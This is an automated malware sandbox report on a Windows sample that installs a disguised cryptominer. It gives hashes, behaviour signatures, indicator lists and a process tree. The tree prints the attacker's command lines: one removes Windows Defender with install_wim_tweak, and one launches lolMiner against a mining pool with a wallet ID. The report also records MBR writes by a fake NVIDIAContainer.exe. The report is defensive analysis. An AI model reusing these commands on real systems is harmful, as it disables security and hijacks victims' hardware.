4c197614f55315eb5832d46451e00b0157bffa76b6e1b2180104d2552448de8d

Analysis

max time kernel
151s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
17-05-2022 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

12.0MB
MD5

df6954981e91e7edac214fbacc452a96
SHA1

e826c4fd82563792315895b1fac558cbc75669d3
SHA256

4c197614f55315eb5832d46451e00b0157bffa76b6e1b2180104d2552448de8d
SHA512

c5168e2e77a93c37f29e0263672f24dc818a1d9f1d2b19064585ee30f2db489122b60c7bced2964b6b45358b68672f8589dc1cb9522e0d138c98ede787c48b89

Score

9^/10

bootkit miner persistence vmprotect

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

Executes dropped EXE 29 IoCs

Processes:

NVIDIAContainer.exeinstall_wim_tweak.exelolMiner.exeinstall_wim_tweak.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exe

pid	process
2452	NVIDIAContainer.exe
2396	install_wim_tweak.exe
2120	lolMiner.exe
4288	install_wim_tweak.exe
3564	lolMiner.exe
3476	lolMiner.exe
864	lolMiner.exe
4832	lolMiner.exe
3364	lolMiner.exe
4108	lolMiner.exe
3548	lolMiner.exe
768	lolMiner.exe
1364	lolMiner.exe
1372	lolMiner.exe
1628	lolMiner.exe
1680	lolMiner.exe
3968	lolMiner.exe
1156	lolMiner.exe
1224	lolMiner.exe
704	lolMiner.exe
4768	lolMiner.exe
2976	lolMiner.exe
3272	lolMiner.exe
2400	lolMiner.exe
808	lolMiner.exe
3084	lolMiner.exe
4068	lolMiner.exe
1956	lolMiner.exe
4668	lolMiner.exe

VMProtect packed file 54 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/2120-144-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3564-155-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3476-163-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/864-171-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/4832-180-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
behavioral2/memory/4832-179-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3364-189-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
behavioral2/memory/3364-188-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/4108-197-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3548-205-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/768-213-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1364-221-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1372-229-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1628-237-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1680-245-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3968-253-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1156-261-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1224-269-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/704-281-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/4768-287-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/2976-299-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3272-305-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/2400-317-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/808-321-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/3084-329-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/4068-335-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect
behavioral2/memory/1956-339-0x0000000140000000-0x0000000141AF5000-memory.dmp	vmprotect
C:\Windows\SysWOW64\ETH\lolMiner.exe	vmprotect

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

NVIDIAContainer.exe

description ioc process

File opened for modification \??\PhysicalDrive0 NVIDIAContainer.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	NVIDIAContainer.exe

Drops file in System32 directory 31 IoCs

Processes:

tmp.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exe

description	ioc	process
File created	C:\Windows\SysWOW64\ETH\lolMiner.exe	tmp.exe
File opened for modification	C:\Windows\SysWOW64\ETH\NVIDIAContainer.exe	tmp.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133349.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133354.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133243.txt	lolMiner.exe
File created	C:\Windows\SysWOW64\ETH\start.bat	tmp.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133210.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133221.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133253.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133334.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133338.txt	lolMiner.exe
File created	C:\Windows\SysWOW64\ETH\NVIDIAContainer.exe	tmp.exe
File opened for modification	C:\Windows\SysWOW64\ETH\start.bat	tmp.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133202.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133329.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133149.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133157.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133228.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133313.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133324.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133344.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133400.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\lolMiner.exe	tmp.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133140.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133233.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133238.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133248.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133258.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133303.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133308.txt	lolMiner.exe
File opened for modification	C:\Windows\SysWOW64\ETH\logs\log_20220517_133318.txt	lolMiner.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs

Processes:

lolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exe

pid	process
2120	lolMiner.exe
3564	lolMiner.exe
3476	lolMiner.exe
864	lolMiner.exe
4832	lolMiner.exe
3364	lolMiner.exe
4108	lolMiner.exe
3548	lolMiner.exe
768	lolMiner.exe
1364	lolMiner.exe
1372	lolMiner.exe
1628	lolMiner.exe
1680	lolMiner.exe
3968	lolMiner.exe
1156	lolMiner.exe
1224	lolMiner.exe
704	lolMiner.exe
4768	lolMiner.exe
2976	lolMiner.exe
3272	lolMiner.exe
2400	lolMiner.exe
808	lolMiner.exe
3084	lolMiner.exe
4068	lolMiner.exe
1956	lolMiner.exe
4668	lolMiner.exe

Drops file in Windows directory 1 IoCs

Processes:

NVIDIAContainer.exe

description ioc process

File created C:\Windows\GprXFaBK.dat NVIDIAContainer.exe

description	ioc	process
File created	C:\Windows\GprXFaBK.dat	NVIDIAContainer.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	lolMiner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	lolMiner.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

NVIDIAContainer.exelolMiner.exelolMiner.exe

pid	process
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2120	lolMiner.exe
2120	lolMiner.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
3564	lolMiner.exe
3564	lolMiner.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

install_wim_tweak.exe

description pid process

Token: SeTakeOwnershipPrivilege 4288 install_wim_tweak.exe

pid	process
668

description	pid	process
Token: SeTakeOwnershipPrivilege	4288	install_wim_tweak.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

tmp.exeNVIDIAContainer.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exelolMiner.exe

pid	process
4388	tmp.exe
4388	tmp.exe
2452	NVIDIAContainer.exe
2452	NVIDIAContainer.exe
2120	lolMiner.exe
2120	lolMiner.exe
2120	lolMiner.exe
2120	lolMiner.exe
2120	lolMiner.exe
3564	lolMiner.exe
3564	lolMiner.exe
3564	lolMiner.exe
3564	lolMiner.exe
3564	lolMiner.exe
3476	lolMiner.exe
3476	lolMiner.exe
3476	lolMiner.exe
3476	lolMiner.exe
3476	lolMiner.exe
864	lolMiner.exe
864	lolMiner.exe
864	lolMiner.exe
864	lolMiner.exe
864	lolMiner.exe
4832	lolMiner.exe
4832	lolMiner.exe
4832	lolMiner.exe
4832	lolMiner.exe
4832	lolMiner.exe
3364	lolMiner.exe
3364	lolMiner.exe
3364	lolMiner.exe
3364	lolMiner.exe
3364	lolMiner.exe
4108	lolMiner.exe
4108	lolMiner.exe
4108	lolMiner.exe
4108	lolMiner.exe
4108	lolMiner.exe
3548	lolMiner.exe
3548	lolMiner.exe
3548	lolMiner.exe
3548	lolMiner.exe
3548	lolMiner.exe
768	lolMiner.exe
768	lolMiner.exe
768	lolMiner.exe
768	lolMiner.exe
768	lolMiner.exe
1364	lolMiner.exe
1364	lolMiner.exe
1364	lolMiner.exe
1364	lolMiner.exe
1364	lolMiner.exe
1372	lolMiner.exe
1372	lolMiner.exe
1372	lolMiner.exe
1372	lolMiner.exe
1372	lolMiner.exe
1628	lolMiner.exe
1628	lolMiner.exe
1628	lolMiner.exe
1628	lolMiner.exe
1628	lolMiner.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.exeNVIDIAContainer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4388 wrote to memory of 3052	4388	tmp.exe	cmd.exe
PID 4388 wrote to memory of 3052	4388	tmp.exe	cmd.exe
PID 4388 wrote to memory of 3052	4388	tmp.exe	cmd.exe
PID 3052 wrote to memory of 2396	3052	cmd.exe	install_wim_tweak.exe
PID 3052 wrote to memory of 2396	3052	cmd.exe	install_wim_tweak.exe
PID 2452 wrote to memory of 3420	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3420	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3420	2452	NVIDIAContainer.exe	cmd.exe
PID 3420 wrote to memory of 2120	3420	cmd.exe	lolMiner.exe
PID 3420 wrote to memory of 2120	3420	cmd.exe	lolMiner.exe
PID 3052 wrote to memory of 4288	3052	cmd.exe	install_wim_tweak.exe
PID 3052 wrote to memory of 4288	3052	cmd.exe	install_wim_tweak.exe
PID 2452 wrote to memory of 2088	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2088	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2088	2452	NVIDIAContainer.exe	cmd.exe
PID 2088 wrote to memory of 3564	2088	cmd.exe	lolMiner.exe
PID 2088 wrote to memory of 3564	2088	cmd.exe	lolMiner.exe
PID 2452 wrote to memory of 4172	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4172	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4172	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2344	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2344	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2344	2452	NVIDIAContainer.exe	cmd.exe
PID 2344 wrote to memory of 3476	2344	cmd.exe	lolMiner.exe
PID 2344 wrote to memory of 3476	2344	cmd.exe	lolMiner.exe
PID 2452 wrote to memory of 3316	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3316	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3316	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 5076	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 5076	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 5076	2452	NVIDIAContainer.exe	cmd.exe
PID 5076 wrote to memory of 864	5076	cmd.exe	lolMiner.exe
PID 5076 wrote to memory of 864	5076	cmd.exe	lolMiner.exe
PID 2452 wrote to memory of 4320	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4320	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4320	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3360	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3360	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3360	2452	NVIDIAContainer.exe	cmd.exe
PID 3360 wrote to memory of 4832	3360	cmd.exe	lolMiner.exe
PID 3360 wrote to memory of 4832	3360	cmd.exe	lolMiner.exe
PID 2452 wrote to memory of 5032	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 5032	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 5032	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4760	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4760	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4760	2452	NVIDIAContainer.exe	cmd.exe
PID 4760 wrote to memory of 3364	4760	cmd.exe	lolMiner.exe
PID 4760 wrote to memory of 3364	4760	cmd.exe	lolMiner.exe
PID 2452 wrote to memory of 2968	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2968	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 2968	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3984	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3984	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 3984	2452	NVIDIAContainer.exe	cmd.exe
PID 3984 wrote to memory of 4108	3984	cmd.exe	lolMiner.exe
PID 3984 wrote to memory of 4108	3984	cmd.exe	lolMiner.exe
PID 2452 wrote to memory of 1492	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 1492	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 1492	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4268	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4268	2452	NVIDIAContainer.exe	cmd.exe
PID 2452 wrote to memory of 4268	2452	NVIDIAContainer.exe	cmd.exe
PID 4268 wrote to memory of 3548	4268	cmd.exe	lolMiner.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\\Uninstall.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:3052

C:\Users\Admin\AppData\Local\Temp\install_wim_tweak.exe
install_wim_tweak.exe /o /l
3⤵
- Executes dropped EXE
PID:2396

C:\Users\Admin\AppData\Local\Temp\install_wim_tweak.exe
install_wim_tweak.exe /o /c "Windows-Defender" /r
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4288

C:\Windows\SysWOW64\ETH\NVIDIAContainer.exe
C:\Windows\SysWOW64\ETH\NVIDIAContainer.exe
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\ETH\start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\SysWOW64\ETH\lolMiner.exe
lolMiner -a etchash -o stratum+tcp://etc-pool.beepool.org:9518 -u cf29084558.Jvjhuwzp -log --no-watchdog
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\ETH\start.bat
2⤵
